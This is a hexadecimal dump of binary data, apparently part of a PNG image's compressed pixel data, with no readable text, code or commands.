244fc001000000244fc001000000244fc001000000244fc001000000244f
c001000000244fc001000000244fc001000000244fc001000000244fc001
000000244fc001000000244fc001000000244fc001000000244fc0010000
00244fc001000000244fc001000000244fc001000000244fc00100000024
4fc001000000244fc001000000244fc001000000244fc001000000244fc0
01000000244fc001000000244fc001000000244fc001000000244fc00100
0000244fc001000000244fc001000000244fc001000000244fc001000000
244fc001000000244fc001000000244fc001000000244fc001000000244f
c001000000244fc001000000244fc001000000244fc001000000244fc001
000000244fc001000000244fc001000000244fc001000000244fc0010000
00244fc001000000244fc001000000244fc001000000244fc00100000024
4fc001000000244fc001000000244fc001000000244fc001000000244fc0
01000000244fc001000000244fc001000000244fc001000000244fc00100
0000244fc001000000244fc001000000244fc001000000244fc001000000
244fc001000000244fc001000000244fc001000000244fc001000000244f
c001000000244fc001000000244fc001000000244fc001000000244fc001
000000244fc001000000244fc001000000244fc001000000244fc0010000
00244fc001000000244fc001000000244fc001000000244fc00100000024
4fc001000000244fc001000000244fc001000000244fc001000000244fc0
01000000244fc001000000244fc001000000244fc001000000244fc00100
0000244fc001000000244fc001000000244fc001000000244fc001000000
244fc001000000244fc001000000244fc001000000244fc001000000244f
c001000000244fc001000000244fc001000000244fc001000000244fc001
000000244fc001000000244fc001000000244fc001000000244fc0010000
00244fc001000000244fc001000000244fc001000000244fc00100000024
4fc001000000244fc001000000244fc001000000244fc001000000244fc0
01000000244fc001000000244fc001000000244fc001000000244fc00100
0000244fc001000000244fc001000000244fc001000000244fc001000000
244fc001000000244fc001000000244fc001000000244fc001000000244f
c001000000244fc001000000244fc001000000244fc001000000244fc001
000000244fc001000000244fc001000000244fc001000000244fc0010000
00244fc001000000244fc001000000244fc001000000244fc00100000024
4fc001000000244fc001000000244fc001000000244fc001000000244fc0
01000000244fc001000000244fc001000000244fc001000000244fc00100
0000244fc001000000244fc001000000244fc001000000244fc001000000
244fc001000000244fc001000000244fc001000000244fc001000000244f
c001000000244fc001000000244fc001000000244fc001000000244fc001
000000244fc001000000244fc001000000244fc001000000244fc0010000
00244fc001000000244fc001000000244fc001000000244fc00100000024
4fc001000000244fc001000000244fc001000000244fc001000000244fc0
01000000244fc001000000244fc001000000244fc001000000244fc00100
0000244fc001000000244fc001000000244fc001000000244fc001000000
244fc001000000244fc001000000244fc001000000244fc001000000244f
c001000000244fc001000000244fc001000000244fc001000000244fc001
000000244fc001000000244fc001000000244fc001000000244fc0010000
00244fc001000000244fc001000000244fc001000000244fc041abda6cb3
cd62e2c4893174e850c5000000a0682a22a25e19680d7beeb967dc7cf3cd
d1bf7fffa8a9a989c30f3f3c66cd9aa530000000b498191cb48a934e3a29
eebbefbee8dfbf7f4444f4eedd3ba64e9d1ad5d5d58a030000408b99c141
c99d7beeb9316edcb846d7bdf8e28b71c82187c4dab56b150a00008066ab
8c880b958152a8a8a8881ffde84771eaa9a736d9668b2db6885ebd7ac593
4f3ea96000000034ff376898c14109545656c64f7ef293183d7a7441ed8f
3aeaa898316386c2010000d02c020e8aae53a74e71c30d37c4a851a30ade
66ce9c393162c48858bd7ab50202000090995b5428ba0b2fbc308e3efae8
4cdbf4e9d3273efcf0c3f8e31fffa880000000646606074575f2c927c7c5
175fdcac6dd7ac591323468c8837df7c5321010000c8c46b62299afdf7df
3f264e9cd8ecedbb74e9d2a2ed010000e8b8cce0a02876df7df7b8efbefb
a27bf7ee2deeeb4b5ffa52bcf2ca2b8a0a000040c1cce0a0c5b6da6aabb8
e38e3b8a126e44448c1b374e51010000c8c40c0e5aa453a74e71df7df7c5
5e7bed55b43eebeaeae2339ff94ccc9f3f5f8101000028ecf7a912d012a7
9f7e7a51c38d8888cacaca38edb4d314170000808299c141b3edbaebaef1
c8238f44555555d1fbaeadad8d3df7dc33962c59a2d0000000e4650607cd
d2ad5bb7b8fefaeb4b126efca7ffaf7ffdeb0a0d00004041041c34cbf9e7
9f1fdb6fbf7d49f7316ad42885060000a020020e32fbc217be10dff8c637
4abe9f3df6d823aaabab151c000080bc041c6452555515975e7a69d1fb5d
ba7469a3cbcde2000000a010020e3239f6d8638b3eabe299679e89cf7dee
73b168d1a206eb0e39e41045070000202f010705ebd1a3479c79e69945ed
f3a1871e8a238f3c32162f5e1c53a74e6db07ec89021b1dd76db293e0000
0039093828d837bff9cdd86cb3cd8ad6df33cf3c13e3c68d8b356bd64444
c4e4c993a3bebee15b8bcde2000000201f010705e9d3a74f8c1d3bb668fd
2d5dba34c68e1d1b757575ff5df6d65b6fc5ac59b31ab41d316284010000
002027010705f9d6b7be15bd7bf72e5a7f679e7966bcf3ce3b0d963ffef8
e30d967de2139f88ae5dbb1a040000009a24e020affefdfbc749279d54b4
fe6ebbedb646838c888869d3a63558565555159ff8c4270c040000004d12
7090d7d8b163a35bb76e45e9ebdd77df8dcb2fbfbcc9f5b366cd6a7466c7
9e7bee692000000068928083dc1748a74e316ad4a8a2f5f7d39ffe343ef8
e0839c6d1a9bdd21e000000020e7ef57252097bdf6da2bfaf7ef5f94bede
78e38d9832654ade768d051cc3860d33180000003449c0414e23478e2c5a
5f3ffad18f62ddba7579db3dfdf4d3b16ad5aa0d966db2c926b1edb6db1a
100000001a25e0a04995959571f0c10717a5af679f7d361e7becb182daae
5ebd3a5e7cf1c506cb3ff5a94f19140000001a25e0a0497befbd776cbae9
a645e9eba28b2ecad4fe95575e69b06c8f3df63028000000344ac041930e
39e490a2f4f3c8238fc473cf3d97699b975f7eb9c1b28103071a14000000
1a25e0a0519d3b778e830e3aa8c5fdac5bb72e2ebdf4d2ccdb35368363ab
adb63230000000344ac041a3f6d9679fe8dbb76f8bfbf99ffff99f78f3cd
37336ff7da6baf457d7dfd06cb060c186060000000689480834615e3819e
2b56ac88abaebaaa59dbae5ebd3ade7ffffd0d9675efdebd28a10b000000
ed8f808346edbaebae2deee3a69b6e8ac58b17377bfba54b973658e63615
0000001a23e0a05143860c69d1f66bd7ae8d5ffef2972dea63d9b2650d96
b94d05000080c6083868a04f9f3e2d0e121e7ae8a158b264498bfa682ce0
308303000080c608386860f0e0c12deea3a5b33722223ef8e08306cb041c
0000003446c04103fdfaf56bd1f6b366cd8ae79e7baec5c7d1d80345051c
0000003446c041032d7d53c9a449938a721c9b6fbe7983659ec101000040
63041c34d092191ccb962d8b071e78a028c7b1d9669b3558d6b3674f0304
00004003020e1ae8d3a74fb3b7bdfbeebba3b6b6b6c5c7d0a54b97e8ddbb
7783e59d3b7736400000003420e0a081cacaca666d575f5f1f77de796751
8e61bbedb62beab1010000d0be09386860e5ca95cdda6efaf4e93167ce9c
a21cc3fefbefdfe87201070000008d1170d04073038e62bc1af63f0e3cf0
c04697bb4505000080c6083868e0830f3ec8bccddcb973e3c9279f2ccafe
b7da6aabf8f8c73fdee83a01070000008d1170d0407366704c9e3c393efc
f0c3a2ecffa0830e6a729d5b54000000688c8083069a13703cf6d86345d9
778f1e3d62ecd8b14dae1770000000d01801070d64bd4565ce9c39f18f7f
fca328fb1e3f7e7cf4efdfbfc9f5020e0000001a23e0a081ac3338a64d9b
5694fd6ebdf5d671da69a7e56ce3191c0000003446c041035967703cfef8
e345d9ef79e79d175dbb76cdd9a658cff9000000a07d1170d04096191c35
3535f1a73ffda9c5fbdc73cf3d63d4a85179db2d5ab4c800010000d08080
8306de79e79da8afaf2fa8edf4e9d363ddba752dda5f4545454c9c38b1a0
b6fffad7bf0c100000000d08386860f5ead5b170e1c282da16e3f91b871d
76587cf2939f2ca8ed82050b0c100000000d083868d49c3973f2b659b76e
5d4c9f3ebd45fbe9d1a347fce0073f28b8bd8003000080c6083868d4dcb9
73f3b6f9f39fff1c3535352ddacfb871e372be16f6a3041c0000003446c0
41a30a09385e7ffdf516ed63abadb68ad34f3f3dd3369ec1010000406304
1c34aa905b54962f5fdea27d5c79e595d1ad5bb74cdb98c1010000406304
1c346adebc7979dbb424e038eeb8e362c4881199b71370000000d098ce4a
40630a99c1b16cd9b266f53d70e0c0b8e0820b326fb766cd9a78efbdf70c
0e0000d0aa2a2a2a9abd2c6bdb42b75fb76e5d7cf8e18706673d028ef5ec
b4d34eb1e38e3bb6ca855baaed5bfa615a7f796d6d6dce5b4876df7df7e8
dcb973a67d555454c4983163a2478f1e99c767c1820571e2892796e45ccb
655ccbe10f6a29f695a55d4ae79ad27595ca35e85cdbe7e7adadc7aa5ccf
b51463d5debe8b3857df457c17f15da45c3e03e5e8e4934f8e471f7dd40f
f9f5c73422ea95e1df264c981013264c5008000000cada29a79c128f3cf2
8842acc70c8e2259bc7871a3b76cd4d7379e1f65599eb58fa664edbbbaba
3a7af7eedd647f0b162c88c58b17177c8cddba758b1d76d8a1d949e9ecd9
b3e3fdf7df6fd6f9b7c538a430c6e55c9354c732eb3e8b719e298c71b9d4
dbe7358cb1cfabb1ec40df178cb1b16c0fdfa13af2f7fb030e3820c68d1b
d7e4fa4e9d3c5253c05122d75d775ddc72cb2dedea9cbef7bdefc599679e
d9e4fa7befbd37aeb8e28a82faaaaaaa8adffef6b7cd0e37d6ac59135ffe
f29763f5ead52e360000a0dddb69a79d72ae4ffd169b5210f9d0a4bffded
6f39d7f7e9d3a7e0bece3aebac18326448b38fe52f7ff98b70030000e830
f23d40d40c8e466aa2043465d6ac5939d7f7eddbb7a07ef6d8638ff8d6b7
bed5a263f9e31fff68400000800e43c0919d8ad0a4b7df7e3be76b590b99
c1d1ad5bb7b8f6da6ba3b2b2b245c73273e64c030200007418f99ed721e0
68a4264a402eb96671545757e7ddfebcf3ce8b8f7dec632d3a8655ab56c5
0b2fbc60300000800ec30c8eec54849c723d87a3baba3aba76eddae4fae1
c387c737bef18d161fc3cc993363eddab506030000e830f2cde0f090d186
041ce4942be0e8d4a95393b33336d96493b8e69a6b8af2a1bbf3ce3b0d04
0000d0a1e49bc1d1d2c700b447020e72caf7a0d1edb7dfbed10fda8d37de
185b6eb9658bf73f67ce9c983e7dba810000003a14b7a864a722e4346fde
bc58be7c7993eb1b0b38ce39e79c183e7c7851f67fc71d77e49d9a050000
d0de78c868762a425eb966717c34e038f8e08363ecd8b145d9efaa55ab62
ead4a906000000e870cce0c84e45c82bd77338d60f38060f1e1c575d7555
d1f67bfffdf7474d4d8d010000003a9c7c0187878c36d45909c82757c0b1
dd76db4565656574efde3d6ebffdf6e8d9b367d1f63b69d224c50700003a
243338b25311f2ca157074e9d225aaababe3aaabae8ac18307176d9f7ffa
d39fe295575e517c0000a043127064a722e43577eedc9cb78a5c7ef9e571
f0c10717759f37de78a3c20300001d96878c66a72214f4c17ae9a5979a5c
bfefbefb16757f4f3df5544c9b364de10100800efd3b2ce78f790147c39a
280185c8759b4a31ad5bb72ece3fff7c050700003a34b7a864a7221424d7
ab628be9f6db6f8fd9b3672b380000d0a10938b253110ad21a3338162f5e
1c3ffbd9cf141b0000e8f0041cd9a9080579f3cd3763c58a1525ddc7a597
5e9af361a60000001d8580233b15a1e00fd7cb2fbf5cb2fe5f7cf1c5b8e7
9e7b141a0000203c64b439548482bdf2ca2b25fbe09e77de79793fc00000
001d45be191c1515158af411020e0a3264c89038ecb0c34ad2f74d37dd14
cf3fffbc22030000fc3fb7a864a722e43568d0a09832654af4ead5abe87d
bff8e28b71d9659729320000c07a041cd9a90839f5efdf3feeb9e79ed86c
b3cd8adef7fbefbf1fa79f7e7aac5dbb56a1010000d623e0c84e4568d2c6
1b6f1c53a74e8d6db6d9a624fd7fef7bdf8bb973e72a34000040d61ff302
8e863551021ad3bd7bf7b8ebaebb62a79d762a49ff53a74e8d071f7c50a1
0100001a610647762a420355555571ebadb7c6d0a1434bd2ffebafbf1ee7
9d779e420300003441c0919d8ab0818a8a8ab8e69a6b62c4881125e97ff5
ead571da69a7c5aa55ab141b0000a009028eec54840d5c72c92571e8a187
96acff73cf3d37fefef7bf2b340000400e028eec3a2b0111ff9eb971e9a5
97c609279c50b27ddc78e38d3165ca14c5060000c8235fc0515151a1481f
21e0203a75ea143ffde94f63f4e8d125dbc7238f3c12975c728962030000
14a0bebe3eefef383624e0e8e81740e7ce71edb5d796f4b694e79f7f3ec6
8f1f9ff7030a0000c0bfb945a519bf6f95a0e3aaaaaa8a1b6fbc310e3ae8
a092ed63debc7971e28927466d6dad8203000065a5b1db3c9abaf5a358cb
0b6ddbb973ee9feb028e86041c45326cd8b058bd7a759b7f080a5d5e5555
15a3478f8e1d76d8a16435a9adad8d871f7e380e3ffcf0669f63d6f32ce5
1fa3721dcb72ac4929cfb39c6a552eff50a63ac6a97e5edbdb18fbbc1a4b
636c8cfd1be33b6147f84ed81e0938041c253372e4c8183972a442aca75b
b76e3176ec58850000002832014743028e2259bc78712c5bb6acc1f2c69e
3bd1d4b3285adab629ebb7ada8a888810307468f1e3d4a5a8f79f3e6c5d2
a54b4b5e872cb569cdb128d7732b87f3cd726ea98da5736bfde33596cead
bd9d9b7fefdad7b9f90ca6f73dc567d0b995d3f794be7dfbc6bdf7de2be0
1070b4beebaebb2e6eb9e596b23ec6debd7bc79429534a1e6e44441c7cf0
c1b164c9121706000040336cb2c92639d70b381aa98912740cfdfaf58bfb
eebb2ff6d8638f56d95f6bed070000a03df21695ec54a403e8ddbb77dc7b
efbdb1ebaebbb6da3e870f1faef0000000cd24e0c84e45dab96eddbac51d
77dc11bbecb24babee57c0010000d07cf99e2dd291de18532801473bd6b9
73e7b8e9a69be2d39ffe74abef7ba79d768a4d37ddd4200000003483191c
d9a9483b555151113ffbd9cf62bffdf66bb3fd9bc5010000d03c028eec54
a49dbaf0c20be3b0c30e2be93e66ce9c193535354daedf77df7d0d040000
40330838b253917668fcf8f171ca29a794741fcf3df75c9c78e289f1d7bf
feb5c936020e000080e6c917705456562ad2470838da992f7ef18b71f6d9
6797741fafbefa6a1c7becb1b172e5ca78fef9e79b6cb7f5d65bc7a04183
0c0a000040461e329a9d80a31d19387060fcfce73f2fe9853e77eedc38fa
e8a363f9f2e51111f1c20b2fe46cef391c000000d9b945253b156927ba75
eb16b7de7a6b6cbcf1c625dbc7a2458be2a8a38e8a850b17fe7759be80c3
6d2a000000d90938b2539176e2f2cb2f8f21438694acff9a9a9a38eaa8a3
62ce9c391b2c7ff7dd77e3adb7de6a72bb7df6d9c7d4290000808cf2dda2
22e068a4264a90bee38f3f3e8e38e28892f55f5b5b1bc71f7f7cbcfaeaab
8daecf358ba35fbf7e250d5e000000daab5cb338041c8dd44409d2b6c71e
7bc4c5175f5cb2fed7ad5b17a79e7a6afcf9cf7f6eb28ddb540000008a2f
57c061a67c43028e8475e9d225aebdf6daa8aaaa2a49fff5f5f571e69967
c6134f3c91b35dae37a94478d028000040737f9335f963de0c8e86355182
748d1f3f3e3ef6b18f95acff1ffef08771fffdf7e76d376bd6ac58b76e5d
93ebf7da6baf928530000000ed555d5d5dd33fe6051c0d6ba20469da76db
6d63fcf8f125ebffe73fff79dc76db6d05b55db56a55bcf6da6b4daeefde
bd7b0c1d3ad4a00100006490eb1695caca4a05fa080147a2aeb8e28ae8d2
a54b49fafefdef7f1f975f7e79a66df2dda6e2391c000000d9780647369d
95203d5ffbdad74af65c8b37df7c33c68d1b97f79dcb1ff5fcf3cfc771c7
1dd7e4fae1c387c78f7ffce38888d864934d62cf3df78c5d76d925faf5eb
177dfbf6dde0fff7e9d32756ae5c194b962c89c58b17c7e2c58bfffb9fe7
ce9d1b3366cc8865cb96b91000008076cd5b54b2117024a677efde71e185
1796a4ef0f3ef820bef18d6f444d4d4de66d5f7cf1c59ceb77db6db7f8d9
cf7e169ffad4a70a7a6e48cf9e3d63f3cd376f745d5d5d5d3cfbecb3f1f8
e38fc7b469d3e28d37de7061000000ed8e878c6623e048ccb9e79e1b9b6e
ba69493e38679c7146bcfefaebcdda7ef6ecd9b162c58ae8d9b367a3ebbb
74e912471e7964518eb5b2b232f6da6bafd86bafbde2fcf3cf8f37df7c33
1e7becb1b8f9e69b63e1c2852e120000a05d3083231b1549c8a04183e298
638e2949dfd75c734d3cfae8a32dfae0e59bc5512adb6ebb6d9c7efae931
73e6cc183f7e7cc99e4d020000d09a041cd9a848424e39e594925cc44f3c
f144fce4273f69f6f615151571c41147c4e0c183dbb43e1b6db4519c73ce
393163c68c38f0c0035d30000040d2041cd9a8482236de78e3183d7a74d1
fb7df3cd37e35bdffa56e6878afec72ebbec120f3ef8605c7df5d5b1c516
5b9445ad060e1c18b7dd765bdc7befbdb1f3ce3bbb7800008024798b4a36
028e441c77dc71d1a3478fa27f58ce38e38c663d54b457af5e71f1c517c7
ef7ef7bb18366c5859d66cf8f0e1f1d8638fc511471ce10202000092e321
a3d9a84802aaaaaae2e4934f2e7abf37df7c733cf7dc7399b7fbea57bf1a
4f3ffd749c7cf2c951595959f6b5bbfaeaab63c284092e24000020296e51
c946451270c8218744fffefd8bdae73ffff9cfb8f2ca2b336d5359591997
5e7a695c7ffdf54dbec2b55c4d983021aebaeaaaa8aaaa724101000049c8
157094fbffd8dc16041c091833664cd13f24dff9ce77a2b6b6b6e06d7af7
ee1d77dd75579c78e289c9d671f4e8d171d75d7745af5ebd5c54000040d9
f30c8e6c041c656ef8f0e13164c890a2f679fbedb7c7b3cf3e5b70fb8103
07c66f7ef39bf8dce73e977c3df7dd77df78e081078a3e23060000a0d8dc
a2928d8a94b9af7ef5ab45ed6fce9c3971d9659715dcfed39ffe743cf2c8
23b1fdf6dbb79b9aeebcf3cef1cb5ffe32ba75ebe602030000ca96878c66
d35909ca5bb1674d7cf7bbdf8d55ab5615d4f6939ffc644c9d3ab55d0601
bbedb65b5c75d55571fae9a7bbc80080926b6a2a793196679da65e8cbedb
e27c8a719ee574dcc538cf148ebb3d5db36d3196b99e2128e0107094cc81
071e18db6cb34d513f041b6fbc710c1830a068c7387ffefc18356a548c1a
352aefb1f4ecd9330e38e080763dcbe190430e89c18307c7dffffef776fd
8f5639fdf1f78f56fbf96292ea172d636c8cfd30f26f4c5bfd8d00283601
47237f9723a23b29086400002000494441545e19fe6dc284095e270a0000
40d95bb87061ecbefbee0ab11e33388ae4d5575f8db973e73658ded83d53
4ddd47f5d1e5c3860d2bdac330e7cf9f1f2fbcf042de6388f8f77337b6d8
628b0e33766bd7ae8dc71f7f3c962d5b5694712b65dba694e2185afb7cb3
d4a05cc7c7b975cc733396cecdb915ffdf95f6fc19f4f7c5b9b94e9d5b96
b64f3cf1446cb7dd768db6378343c0513277df7d77dc72cb2d45ebafaaaa
2a5e79e595a2fd803ffcf0c363debc7979db4e9c38b143851bffa9f5aebb
ee1a5ff8c21762e5ca952e660000a02cd4d5d535b94ec0d1484d94a03c0d
1d3a3436da68a3a2f475d75d7715146eecbdf7de71ca29a774c87a575757
c719679ce1c2030000ca46aed7c45656562ad0470838cad4673ffbd9a2f4
b372e5cab8faeaabf35f089d3ac5c489133b74cd4f3bedb4183468908b0f
0000280b5e139b8d8a94a962bd1ef6de7bef8d77df7d376fbbd1a347c7ae
bbeedaa16bdea54b970e1ff2000000e523d70c0e6f726a48c051a676da69
a7a2f43379f2e4bc6d7af6ec19679f7db6a247c47efbed175ffce2171502
00006873b9020e33381aa98912949f5ebd7a45f7eedd5bdccf5ffffad778
f9e597f3b6fbf6b7bf1d9b6db699c2ffbf8b2eba28aaaaaa140200006853
028e6c54a40c6dbef9e645e967ca942979db6cb9e5961df6c1a24dd976db
6de3d4534f55080000a04d0938b2f19ad832d4bf7fff16f7b172e5caf8f5
af7f9db7dda851a3a24b972e6d729eafbefa6adc7aebad515d5d1d03070e
8ceaeaeaa8aeae8e4d37ddb4cdc760cc983171f3cd37c7dab56b5d900000
409b10706423e02843c5b85de4a1871e8a152b56e46d77f0c10717fdf8eb
eaeae2c9279f8cbe7dfbc6d0a1439b6cd7a74f9f983a756a83e583060d8a
638e3926468f1edd6661c7a69b6e1a071c7040fce637bf71410200006d22
d75b543c64b421914f192ac60c8e427e98f7efdf3f670091d5bc79f3e2ca
2baf8c3df7dc338e3ffef878ecb1c772b6df72cb2da367cf9e0d96cf9933
277ef4a31fc5d0a143e3d4534f8da79e7a2ae707bb548e3bee3817230000
d066cce0c84645ca504b9fc1b176edda78e69967f2b63be8a0838a92facd
9a352b8e3cf2c8d87befbde3eaabaf8e77de792722225e7ffdf5bcdbeeb0
c30e39cfe3e1871f8e238f3c323ef399cfc4e38f3fdeaae3b0cf3efbc4a0
41835c900000409b107064a32265a8a501c75ffef29758b56a55de76071e
78608bf653535313e79e7b6e1c74d0418dceb278edb5d7f2f6b1fdf6db17
b4afb973e7c689279e1813274e6cb5e762545454c4b1c71eeb82040000da
44ae802342c8d1a01e4a507e5a7a8bcad34f3f9db74dbf7efd62efbdf76e
f63e7efffbdfc7673ffbd998346952d4d5d535da66fefcf9b172e5ca9cfd
e49ac1f151f5f5f571d34d37c521871c12f3e6cd6b95b1183d7ab457c602
00006d42c0918d6a94a196cee02824e0d86fbffda2b2b2b259fd5f7bedb5
71c20927c4a2458b72b6abafaf8fd9b367e76c9325e0f88f175f7c31befc
e52fb7ca034037d9649338e080035c94000040abcbf72c420f1add9080a3
9d79fffdf7e3c5175fccdb6edb6db7cddcf7dab56b63cc983171f9e597e7
4d12ff23df6d2acd093822fe7d7bcc983163e2eebbef2e794df7d9671f17
160000d0eacce0c84635cad0e2c58b9bbdeddffffef7266f19595fdfbe7d
33f77de18517669e3591ef41a35b6fbd75f4e8d1a3d9e77bf6d967c773cf
3d57d2f1d8638f3d5c94000040ab137064a31a6568c99225cddef68d37de
28a85d9f3e7d32f57befbdf7c6a44993321f4fbe191c1515153178f0e066
9fef9a356be29bdffc662c5cb8b064e3b1d34e3b45f7eedd5d98000040ab
127064a31a65a82501c73ffef18f82da6599c1f1b7bffd2dbefffdef37eb
780a79934a736f53f98f850b17c6c9279f1c6bd6ac29c97874eedc3976db
6d3717260000d0aa041cd9a846196ac92d2ac50e38962c5912279f7c72ac
5ebdba59c7f3f6db6fc7071f7c90b34d4b038e8888e79f7fbed9214c21dc
a6020000b4360f19cd46c05186cae91695091326c4db6fbfdda20f64bee7
701423e08888b8e79e7be2f7bfff7d49c644c0010000b4b67c014773df8c
d95e0938ca507367707cf8e1873177eedc82daf6eedd3b6f9b79f3e6c5e3
8f3fdee2f329d59b541a73d34d3795644c76df7d7717260000d0aadca292
8d6a94a1f9f3e7376bbb152b56c4ba75eb0a6abb74e9d2bc6da64c999237
312c44be80a3baba3aba76ed5a94dacd9c39335e7ef9e5a28f49d687b202
0000b49480231bd528432fbffc724101c4472d5bb6ace0b6f3e6cdcbb97e
ddba7571cf3df714e57cf2051c9d3a758aedb6dbae68f52bc52c8e2e5dba
b8300100805625e0c84635caf4227efae9a7336fb77cf9f282dbe69b25f2
c4134f14edd5abadf12695f53df8e083f1ce3bef14754c2a2b2bdddf0600
00b42a0f19cd46c051a666cc9891799b2c0147be6775fcf6b7bf2ddab92c
58b020de7ffffd9c6d8a1970ac5dbb366ebbedb6a28f89591c0000406b32
83231bd52853cd09388a798bca82050b8a7a3eadf52695ff983c7972519e
1fb23e01070000d09a041cd9a84699fad7bffe15b367cfceb44d5d5d5dc1
6df3dda252ec5b3ce6cc9993737d319fc111f1efb0a725afb76d4cb11e84
0a00005008014736aa51c6b2cee2e8d7af5fc16d67cf9e9df38d2b8b162d
2aeab9e4bb25669b6db6297afd0a79f647a60f8b3f1e0000402b127064fc
cda604e5ebc9279fccd43e4bc051535313cf3cf34ca3eb56ad5a95f79919
59e5bb25a6478f1eb1c9269b14759fc50c38d6ad5b178b172f7651020000
adc64346b3117094b1a79e7a2ad36d1659028e888869d3a6b5da8724df0c
8e88e2cfe2c8f7dc8f2cde7aebad9c335e0000008a2ddf0c0e6f7adc9080
a38cd5d5d5c51d77dc5170fbac33209a0a38ba75eb169b6db65951cfa590
80a3bababaa8fb2ce60c8e7ccf100100002836b7a864d35909cadb942953
e2bbdffd6e416ff0e8d2a54b6cb4d146f1c1071f14d4f7bc79f3e2d5575f
8d9d77deb9c1ba6db6d926de7df7dda29dc7c2850b63cd9a3539cf63ebad
b72e6aed66cf9e1df5f5f5459991f2e69b6fba1801801669ec3b4953df53
8ab5bc547d97f2b88b718e299f4f6b8f655b5d9baed9c2daf7e9d347c021
e0687d071e7860a3b75814e303336fdebc183c787041c771f5d55737f9ac
88c6fa6eeab68bb3cf3ebbd1590b2d399fdadada9c01c791471e19db6fbf
7d51bf24ac5cb93236da68a3168fefd0a143e3faebaf4ff28f7939fd91ef
c85f40523e9f8efc05c418fb92e98751c7fa37a6d4d71540b1f93bf4917a
4444bd32fcdb84091362c284090a01000040d9db6fbffde2e5975f5688ff
67064791bcf4d24bf1c61b6f3458ded8536f9b7a126eaeb623468c28e821
a24b962c89e9d3a7673a86bdf6da2b060e1cb8c1faa54b97fef7191dcd39
dec696efb9e79eb1c30e3b3479ec353535f1d0430f15ad661111871d7658
f4ecd9b3c5e37bcf3df7c48a152b8a5287d66adb94723dde2cdb67a9414a
e7ebdcd23db7f6fa19cc726eae53e7e6dcd2f9fb622c9d9b736bdb73cbb2
fd65975d16279c704293c7e21615014749fcea57bf8a5b6eb9a564fd7ff5
ab5f6df21689f5f5eddb372eb8e08258b66c59c17defb8e38e317dfaf40d
a637f5eddb377efce31fc7bffef5afa29dc3983163e2820b2e68727dd7ae
5de3fbdfff7ea63f2ef98c1c39b2c501c7ebafbf1edff9ce775ce4000040
abf290d16c5423110f3ef860bcfaeaabf907b453a7f8ec673f9ba9efd75e
7b2d1e7becb106cbf7df7fffa29e43be37a974edda3536df7cf3a2eeb347
8f1e2dee63c68c192e400000a0d5e5fb1f7f051c1fa98712a4e1c30f3f8c
8b2fbeb8a0b623468cc8dcffd5575fdd60d949279d54d4f72a17f2aad862
be4965c08001d1bd7bf716f723e0000000da425d5d5dee1ff4028e0deba1
04e9f8c31ffe104f3df554de76fbedb75fe61ff6b366cd8ac993276fb06c
bbedb68b430f3db468c73f7ffefcbc6daaabab8bb6bfdd77dfbdc57dac59
b326fef77fffd7c5070000b43ab7a864a31a89b9e8a28bf25ee4fdfaf58b
e38f3fbe597dbffdf6db1b2cfbfef7bf5fd0c34d0bb162c58a58b26449ce
36e51670fcf9cf7f8e55ab56b9f00000805627e0c8463512f3ca2bafc47d
f7dd97b7dde9a79f1eddba75cbd4f7fbefbf1fdffdee773758b6f5d65bc7
19679c51b4e39f376f5ecef5db6cb34dd1f6558c80e3fefbef77d1010000
6dc23338b2518d045d71c515515b5b9bb3cde69b6f1ec71e7b6ce6be67cc
9811b7df7efb06cb962e5d5ab463cf1770146b0647f7eedd63b7dd766b51
1f8b172f16700000006dc63338b2518d042d58b020aebbeebabcedc68d1b
175dbb76cddcff0f7ff8c3b8e79e7bfefbdfdf7aebada21d7bbe078d16eb
21a35ff9ca575afc06953beeb823d6ac59e382030000da44be5b542a2a2a
14693d028e445d77dd75f1b7bffd2d679bfefdfbc731c71cd3ac0fd18409
1362d2a449b166cd9a06cfe568897c01c7565b6d559414f2c8238f6cd1f6
6bd6ac893befbcd385060000b419cfe0c8463512b56eddbaf8f6b7bf9d77
86c1f8f1e363e38d376ed607e9dc73cf8d214386c40b2fbc50b4e3ce778b
4a5555556cb1c5162ddac7a0418362afbdf66a511fbffef5afe3dd77df75
a10100006d46c0918d6a24ecb5d75e8b2bafbc32679bfefdfbc7d5575fdd
ec7d7cf0c107b17af5eaa21d73be191c112d7f0ec7e8d1a35b34556bedda
b571c30d37b8c00000803625e0c8463512f78b5ffc22fef297bfe46cb3ff
fefbc7a9a79e5a16c7bb60c18258bb766dce362d79934aaf5ebd9a755bce
fa7efef39fc7ecd9b35d5c0000409b127064a31aede0823fe38c3362d5aa
5539db9d7beeb945796d6a4bd5d5d5e57da6474b66704c98302136dd74d3
666f3f7bf6ec16cd7801000028e6efbd9c3fe8051c1bd64309d23767ce9c
38fffcf373b6a9aaaa8a5ffce217d1bb77ef363fde7ccfe168ee9b5476dc
71c738e9a4935af4c7e3acb3ceca3bc3040000a035784d6c36aad14e4c99
3225264f9e9cb3cd36db6c5316b313f23d8763c08001cdeaf7e28b2f8ece
9d3b37fbb8264d9a14cf3df79c8b090000280bf5f5f5b97fd00b3836ac87
12b41f3ff8c10fe2f9e79fcfd9e680030e884b2eb9a44d3f08f9028ee6dc
623272e4c8183e7c78b38fe9a5975e8acb2ebbcc45040000940db7a864a3
1aedc8dab56be39bdffc66ded79b9e74d24971e38d3746972e5ddae438f3
dda2b2d9669b65ea6fc71d77ccfb36995ce6cc9913c71c734cac5cb9d245
040000940db7a864a31aedcc3befbc1363c68c8975ebd6e56c3772e4c898
3a756a9b3c9323df0c8e7efdfa15fc41dd6aabad62ead4a9b1f1c61b37eb
58162e5c18471e7964de50080000a0b5e59bc1515151a148eb1170b443cf
3cf34c9c73ce3979efd7da7befbde3d7bffe756cb1c516ad7a7cf9028e4e
9d3a45bf7efdf2f6d3b76fdf983a756ab38fbfa6a6268e3efae8bc334a00
0000da82677064a31aedd4e4c993e3dc73cfcddb6ee79d778e871f7e3876
d86187563bb69a9a9a58be7c79ce36f96e53e9debd7bdc79e79d3178f0e0
661dc38a152be284134e88575f7dd5c50200009425cfe0c84635dab15ffe
f29705851c03060c88dffce6373166cc98a8aaaa6a95636bc98346070c18
1053a64c89a14387366bdf73e6cc89af7ce52bf1a73ffdc945020000942d
cfe0c84635dab9499326151472f4ead52b2eb8e08298316346ecbffffe25
3fae7c01475333380e3df4d0983e7d7a7cfad39f6ed67e67cc9811071e78
60bcfefaeb2e0e0000a0ac99c1918d6a740093264d8af3ce3bafa0b68306
0d8a499326c5af7ef5abd865975d4a764cf3e7cfcfb9fea333387af7ee1d
37dc7043dc70c30dcd7e30ea4d37dd14c71e7b6cdedb63000000ca818023
1bd5e8206ebffdf638fffcf30b6ebfcf3efbc4b469d3e2273ff949e6d7b6
